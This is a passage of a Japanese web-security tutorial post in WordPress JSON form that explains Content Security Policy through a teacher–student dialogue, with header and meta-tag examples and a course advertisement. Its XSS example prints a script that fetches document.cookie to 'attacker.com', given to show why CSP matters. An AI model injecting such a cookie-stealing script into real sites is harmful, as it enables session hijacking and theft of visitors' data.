{"id":12348,"date":"2026-02-02T17:24:47","date_gmt":"2026-02-02T17:24:47","guid":{"rendered":"https:\/\/withcode.tech\/media\/?p=12348"},"modified":"2026-04-02T05:09:48","modified_gmt":"2026-04-02T05:09:48","slug":"content_security_policy","status":"publish","type":"post","link":"https:\/\/withcode.tech\/media\/content_security_policy\/","title":{"rendered":"Content Security Policy (CSP)\u306e\u5b9f\u88c5\u30ac\u30a4\u30c9\uff5c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u6bb5\u968e\u7684\u5c0e\u5165\u307e\u3067\u5fb9\u5e95\u89e3\u8aac"},"content":{"rendered":"<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.40.37.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u6700\u8fd1\u3001XSS\u653b\u6483\u304b\u3089Web\u30b5\u30a4\u30c8\u3092\u5b88\u308b\u65b9\u6cd5\u3092\u8abf\u3079\u3066\u3044\u305f\u3089\u300cCSP\u300d\u3068\u3044\u3046\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3092\u898b\u3064\u3051\u305f\u3093\u3067\u3059\u3051\u3069\u3001\u3069\u3046\u3084\u3063\u3066\u5b9f\u88c5\u3059\u308c\u3070\u826f\u3044\u3093\u3067\u3059\u304b\uff1f<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.11.23.jpg\" 
alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u3088\u30fc\u304f\u805e\u304f\u3093\u3060\u305e\uff01CSP\uff08Content Security Policy\uff09\u306f\u3001XSS\u653b\u6483\u3092\u9632\u3050\u975e\u5e38\u306b\u5f37\u529b\u306a\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3058\u3083\u3002\u4eca\u65e5\u306f\u57fa\u672c\u7684\u306a\u4ed5\u7d44\u307f\u304b\u3089\u5b9f\u8df5\u7684\u306a\u5b9f\u88c5\u65b9\u6cd5\u307e\u3067\u3001\u8a73\u3057\u304f\u89e3\u8aac\u3059\u308b\u305e\u3044\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u3042\u308a\u304c\u3068\u3046\u3054\u3056\u3044\u307e\u3059\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3044\u305f\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<p class=\"wp-block-paragraph\">Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306f\u3001\u958b\u767a\u8005\u306b\u3068\u3063\u3066\u6700\u3082\u91cd\u8981\u306a\u8ab2\u984c\u306e\u4e00\u3064\u3067\u3059\u3002\u7279\u306bXSS\uff08Cross-Site 
Scripting\uff09\u653b\u6483\u306f\u3001\u500b\u4eba\u60c5\u5831\u306e\u6f0f\u6d29\u3084\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a\u306a\u3069\u3001\u6df1\u523b\u306a\u88ab\u5bb3\u3092\u3082\u305f\u3089\u3059\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u306f\u3001<strong><span class=\"swl-marker mark_yellow\">Content Security Policy (CSP)\u306e\u5b9f\u88c5\u65b9\u6cd5<\/span><\/strong>\u306b\u3064\u3044\u3066\u3001\u57fa\u672c\u7684\u306a\u4ed5\u7d44\u307f\u304b\u3089\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a73\u7d30\u3001\u5b9f\u8df5\u7684\u306a\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u96c6\u3001\u6bb5\u968e\u7684\u306a\u5c0e\u5165\u65b9\u6cd5\u3001\u3088\u304f\u3042\u308b\u554f\u984c\u306e\u89e3\u6c7a\u65b9\u6cd5\u307e\u3067\u3001\u5b9f\u88c5\u4f8b\u3092\u4ea4\u3048\u306a\u304c\u3089\u8a73\u3057\u304f\u89e3\u8aac\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-icon_announce wp-block-paragraph\">\u300c\u5b66\u7fd2\u2192\u6848\u4ef6\u7372\u5f97\u300d\u306b\u3064\u306a\u3052\u305f\u53d7\u8b1b\u751f\u306e\u30ea\u30a2\u30eb\u306a\u4f53\u9a13\u8ac7\u3082\u516c\u958b\u4e2d\uff01<br>\u50cd\u304d\u65b9\u3092\u5909\u3048\u305f\u3044\u65b9\u306b\u3082\u97ff\u304f\u30b9\u30c8\u30fc\u30ea\u30fc\u3067\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-icon_info 
wp-block-paragraph\"><strong><strong>\u83c5\u4e95<\/strong>\u3055\u3093<\/strong><br>\u5c06\u6765\u7684\u3078\u306e\u4e0d\u5b89\u3068\u5b50\u80b2\u3066\u3068\u3044\u3046\u80cc\u666f\u304b\u3089\u300c\u526f\u696d\u300d\u306b\u6311\u6226\u3057\u3088\u3046\u3068\u6c7a\u610f\u3002\u72ec\u5b66\u304b\u3089\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u306e\u5b66\u7fd2\u3092\u958b\u59cb\u3057\u3066\u3044\u305f\u304c\u3001WithCode\u306b\u51fa\u4f1a\u3044\u4f53\u9a13\u30b3\u30fc\u30b9\u3092\u53d7\u8b1b\u3002\u7d044\u30f6\u6708\u306e\u5b66\u7fd2\u306b\u53d6\u308a\u7d44\u307f\u3001\u5f53\u521d\u306e\u76ee\u6a19\u3067\u3042\u3063\u305f\u5352\u696d\u30c6\u30b9\u30c8\u5408\u683c\u3092\u5b9f\u73fe\u3057\u305f\u3002WithCode Platinum\u306b\u30663\u4ef6\u306e\u6848\u4ef6\u3092\u62c5\u5f53\u3057\u3001\u73fe\u5728\u306f\u526f\u696d\u3060\u3051\u3067\u306a\u304f\u672c\u683c\u7684\u306b\u300c\u30d5\u30ea\u30fc\u30e9\u30f3\u30b9\u300d\u3068\u3057\u3066\u5728\u5b85\u3067\u6d3b\u8e8d\u3057\u3066\u3044\u304d\u305f\u3044\u3068\u8003\u3048\u308b\u3088\u3046\u306b\u306a\u308b\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8a73\u3057\u304f\u306f<a href=\"https:\/\/withcode.tech\/media\/interview_5\/\" title=\"\">\u3053\u3061\u3089\u306e\u8a18\u4e8b<\/a>\u3092\u3054\u89a7\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed is-provider-withcode-media wp-block-embed-withcode-media\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/withcode.tech\/media\/interview_5\/\n<\/div><\/figure>\n\n\n\n<p class=\"is-style-balloon_box2 wp-block-paragraph\"><strong><strong><strong>\u83c5\u4e95<\/strong><\/strong>\u3055\u3093\u306e\u4e3b\u306a\u5236\u4f5c\u5b9f\u7e3e\u306f\u3053\u3061\u3089<\/strong><\/p>\n\n\n<div class=\"swell-block-postLink\">\t\t\t<div class=\"p-blogCard -external\" data-type=\"type3\" data-onclick=\"clickLink\">\n\t\t\t\t<div class=\"p-blogCard__inner\">\n\t\t\t\t\t<span 
class=\"p-blogCard__caption\">\u5e83\u544a\u7528\u9014\u3067\u306e\u65b0\u898fLP\u5236\u4f5c<\/span>\n\t\t\t\t\t<div class=\"p-blogCard__thumb c-postThumb\"><figure class=\"c-postThumb__figure\"><img decoding=\"async\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/08\/study-office.net_lp-2.webp\" alt=\"\" class=\"c-postThumb__img u-obf-cover\" width=\"320\" height=\"180\"><\/figure><\/div>\t\t\t\t\t<div class=\"p-blogCard__body\">\n\t\t\t\t\t\t<a class=\"p-blogCard__title\" href=\"https:\/\/withcode.tech\/works\/yourdelt\/\" target=\"_blank\" rel=\"noopener noreferrer\">\u682a\u5f0f\u4f1a\u793eYOURDELT \u69d8<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Content Security Policy (CSP)\u3068\u306f\uff1f<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663.jpg\" alt=\"\" class=\"wp-image-13253\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006663-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">Content Security Policy (CSP)\u306f\u3001Web\u30b5\u30a4\u30c8\u3067\u8aad\u307f\u8fbc\u3080\u30ea\u30bd\u30fc\u30b9\uff08JavaScript\u3001CSS\u3001\u753b\u50cf\u306a\u3069\uff09\u306e\u53d6\u5f97\u5143\u3092\u5236\u9650\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\u3067\u3059\u3002HTTP\u30d8\u30c3\u30c0\u30fc\u307e\u305f\u306fHTML\u306e<code>&lt;meta&gt;<\/code>\u30bf\u30b0\u3067\u8a2d\u5b9a\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u304c\u9632\u3050\u653b\u6483<\/h3>\n\n\n\n<p 
class=\"wp-block-paragraph\">CSP\u306f\u4e3b\u306b\u4ee5\u4e0b\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>XSS\uff08Cross-Site Scripting\uff09\u653b\u6483<\/strong>\uff1a\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u306e\u5b9f\u884c\u3092\u9632\u6b62<\/li>\n\n\n\n<li><strong>\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u653b\u6483<\/strong>\uff1a\u4e0d\u6b63\u306a\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u57cb\u3081\u8fbc\u307f\u3092\u30d6\u30ed\u30c3\u30af<\/li>\n\n\n\n<li><strong>\u30d1\u30b1\u30c3\u30c8\u76d7\u8074<\/strong>\uff1aHTTPS\u3078\u306e\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3092\u5f37\u5236<\/li>\n\n\n\n<li><strong>\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0<\/strong>\uff1a\u30d5\u30ec\u30fc\u30e0\u57cb\u3081\u8fbc\u307f\u3092\u5236\u9650<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u306e\u4ed5\u7d44\u307f<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u306f\u3001<strong><span class=\"swl-marker mark_yellow\">\u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u65b9\u5f0f<\/span><\/strong>\u3067\u30ea\u30bd\u30fc\u30b9\u306e\u8aad\u307f\u8fbc\u307f\u3092\u5236\u5fa1\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u958b\u767a\u8005\u304c\u300c\u8a31\u53ef\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u306e\u53d6\u5f97\u5143\u300d\u3092\u6307\u5b9a<\/li>\n\n\n\n<li>\u30d6\u30e9\u30a6\u30b6\u304c\u30dd\u30ea\u30b7\u30fc\u306b\u9055\u53cd\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u3092\u30d6\u30ed\u30c3\u30af<\/li>\n\n\n\n<li>\u9055\u53cd\u3092\u691c\u51fa\u3057\u305f\u5834\u5408\u3001\u30aa\u30d7\u30b7\u30e7\u30f3\u3067\u30ec\u30dd\u30fc\u30c8\u3092\u9001\u4fe1<\/li>\n<\/ol>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u4f8b\u3048\u3070\u3001\u300c\u81ea\u30b5\u30a4\u30c8\u3068CDN\u306eJavaScript\u306e\u307f\u8a31\u53ef\u300d\u3068\u8a2d\u5b9a\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u304c\u57cb\u3081\u8fbc\u3093\u3060\u5916\u90e8\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u5b9f\u884c\u3055\u308c\u307e\u305b\u3093\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u306e\u5b9f\u88c5\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u306f2\u3064\u306e\u65b9\u6cd5\u3067\u8a2d\u5b9a\u3067\u304d\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd51: HTTP\u30d8\u30c3\u30c0\u30fc\uff08\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd52: HTML\u306emeta\u30bf\u30b0<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com&quot;&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HTTP\u30d8\u30c3\u30c0\u30fc\u304c\u63a8\u5968\u3055\u308c\u308b\u7406\u7531\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u3059\u3079\u3066\u306e\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u304c\u4f7f\u7528\u53ef\u80fd\uff08meta\u30bf\u30b0\u3067\u306f\u4e00\u90e8\u5236\u9650\u3042\u308a\uff09<\/li>\n\n\n\n<li>HTML\u304c\u89e3\u6790\u3055\u308c\u308b\u524d\u306b\u9069\u7528\u3055\u308c\u308b<\/li>\n\n\n\n<li>\u30b5\u30fc\u30d0\u30fc\u5074\u3067\u4e00\u5143\u7ba1\u7406\u3067\u304d\u308b<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 
class=\"wp-block-heading\">\u306a\u305cCSP\u304c\u5fc5\u8981\u306a\u306e\u304b\uff1fXSS\u653b\u6483\u306e\u8105\u5a01<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1.jpg\" alt=\"\" class=\"wp-image-13256\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006664-1-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.13.05.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u91cd\u8981\u6027\u3092\u7406\u89e3\u3059\u308b\u305f\u3081\u306b\u3001\u307e\u305a\u306fXSS\u653b\u6483\u306e\u5371\u967a\u6027\u3092\u898b\u3066\u3044\u3053\u3046\uff01\u3053\u3053\u3092\u77e5\u3063\u3066\u304a\u304b\u306a\u3044\u3068\u5927\u5909\u306a\u76ee\u306b\u906d\u3044\u3084\u3059\u304f\u306a\u308b\u304b\u3089\u306e\u3046\u3002<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" 
src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u305d\u3046\u306a\u3093\u3067\u3059\u306d\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">XSS\u653b\u6483\u306e\u5b9f\u4f8b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u6483\u8005\u304c\u63b2\u793a\u677f\u306b\u3053\u306e\u3088\u3046\u306a\u30b3\u30e1\u30f3\u30c8\u3092\u6295\u7a3f\u3057\u305f\u3068\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;script&gt;\n  \/\/ \u30e6\u30fc\u30b6\u30fc\u306eCookie\u3092\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\n  fetch(&#39;https:\/\/attacker.com\/steal?data=&#39; + document.cookie);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u30b5\u30cb\u30bf\u30a4\u30ba\uff08\u7121\u5bb3\u5316\u51e6\u7406\uff09\u304c\u4e0d\u5341\u5206\u306a\u5834\u5408\u3001\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u305d\u306e\u307e\u307e\u5b9f\u884c\u3055\u308c\u3001\u8a2a\u554f\u8005\u306eCookie\u304c\u76d7\u307e\u308c\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>XSS\u653b\u6483\u3067\u53ef\u80fd\u306a\u3053\u3068\uff1a<\/strong><\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li><strong>\u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af<\/strong>\uff1a\u30ed\u30b0\u30a4\u30f3\u60c5\u5831\u3092\u76d7\u3093\u3067\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a<\/li>\n\n\n\n<li><strong>\u500b\u4eba\u60c5\u5831\u306e\u7a83\u53d6<\/strong>\uff1a\u30d5\u30a9\u30fc\u30e0\u5165\u529b\u5185\u5bb9\u3084\u8868\u793a\u30c7\u30fc\u30bf\u306e\u53d6\u5f97<\/li>\n\n\n\n<li><strong>\u30de\u30eb\u30a6\u30a7\u30a2\u914d\u5e03<\/strong>\uff1a\u507d\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30ea\u30f3\u30af\u306e\u8868\u793a<\/li>\n\n\n\n<li><strong>\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0<\/strong>\uff1a\u507d\u306e\u30ed\u30b0\u30a4\u30f3\u30d5\u30a9\u30fc\u30e0\u3092\u8868\u793a<\/li>\n\n\n\n<li><strong>DDoS\u653b\u6483<\/strong>\uff1a\u8a2a\u554f\u8005\u306e\u30d6\u30e9\u30a6\u30b6\u3092\u8e0f\u307f\u53f0\u306b<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">CSP\u304cXSS\u653b\u6483\u3092\u9632\u3050\u4ed5\u7d44\u307f<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u3092\u9069\u5207\u306b\u8a2d\u5b9a\u3059\u308b\u3068\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u9632\u5fa1\u3067\u304d\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u30dd\u30ea\u30b7\u30fc\u306e\u52b9\u679c\uff1a<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li><strong>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a<code>&lt;script&gt;<\/code>\u30bf\u30b0\u5185\u306e\u30b3\u30fc\u30c9\u306f\u5b9f\u884c\u3055\u308c\u306a\u3044<\/li>\n\n\n\n<li><strong>\u5916\u90e8\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a<code>https:\/\/attacker.com<\/code>\u304b\u3089\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u8aad\u307f\u8fbc\u307e\u308c\u306a\u3044<\/li>\n\n\n\n<li><strong>eval()\u3092\u30d6\u30ed\u30c3\u30af<\/strong>\uff1a\u6587\u5b57\u5217\u304b\u3089\u306e\u30b3\u30fc\u30c9\u5b9f\u884c\u3092\u9632\u6b62<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u6483\u8005\u304c\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u57cb\u3081\u8fbc\u3093\u3067\u3082\u3001\u30d6\u30e9\u30a6\u30b6\u304c\u5b9f\u884c\u3092\u62d2\u5426\u3059\u308b\u305f\u3081\u3001\u88ab\u5bb3\u3092\u9632\u3052\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5f93\u6765\u306e\u9632\u5fa1\u7b56\u3068\u306e\u9055\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b5\u30cb\u30bf\u30a4\u30ba\uff08\u30a8\u30b9\u30b1\u30fc\u30d7\u51e6\u7406\uff09\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u958b\u767a\u8005\u304c\u5b8c\u74a7\u306b\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b<\/li>\n\n\n\n<li>1\u7b87\u6240\u3067\u3082\u6f0f\u308c\u304c\u3042\u308c\u3070\u8106\u5f31\u6027\u304c\u6b8b\u308b<\/li>\n\n\n\n<li>\u65b0\u3057\u3044\u653b\u6483\u624b\u6cd5\u3078\u306e\u5bfe\u5fdc\u304c\u9045\u308c\u308b\u53ef\u80fd\u6027<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>CSP\uff08\u591a\u5c64\u9632\u5fa1\uff09\uff1a<\/strong><\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\u30b5\u30cb\u30bf\u30a4\u30ba\u6f0f\u308c\u304c\u3042\u3063\u3066\u3082\u653b\u6483\u3092\u9632\u3052\u308b<\/li>\n\n\n\n<li>\u30d6\u30e9\u30a6\u30b6\u30ec\u30d9\u30eb\u3067\u5f37\u5236\u3055\u308c\u308b<\/li>\n\n\n\n<li>\u65e2\u77e5\u30fb\u672a\u77e5\u306e\u653b\u6483\u624b\u6cd5\u306e\u4e21\u65b9\u306b\u52b9\u679c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"swl-marker mark_yellow\">CSP\u306f\u30b5\u30cb\u30bf\u30a4\u30ba\u306e\u4ee3\u66ff\u3067\u306f\u306a\u304f\u3001\u8ffd\u52a0\u306e\u9632\u5fa1\u5c64<\/span><\/strong>\u3068\u3057\u3066\u6a5f\u80fd\u3057\u307e\u3059\u3002\u4e21\u65b9\u3092\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5927\u5e45\u306b\u5f37\u5316\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a73\u7d30\u89e3\u8aac<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665.jpg\" alt=\"\" class=\"wp-image-13257\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006665-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div 
class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306f\u3001\u8907\u6570\u306e\u300c\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u300d\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u8a2d\u5b9a\u3059\u308b\u3002\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306f\u7279\u5b9a\u306e\u7a2e\u985e\u306e\u30ea\u30bd\u30fc\u30b9\u3092\u5236\u5fa1\u3059\u308b\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" 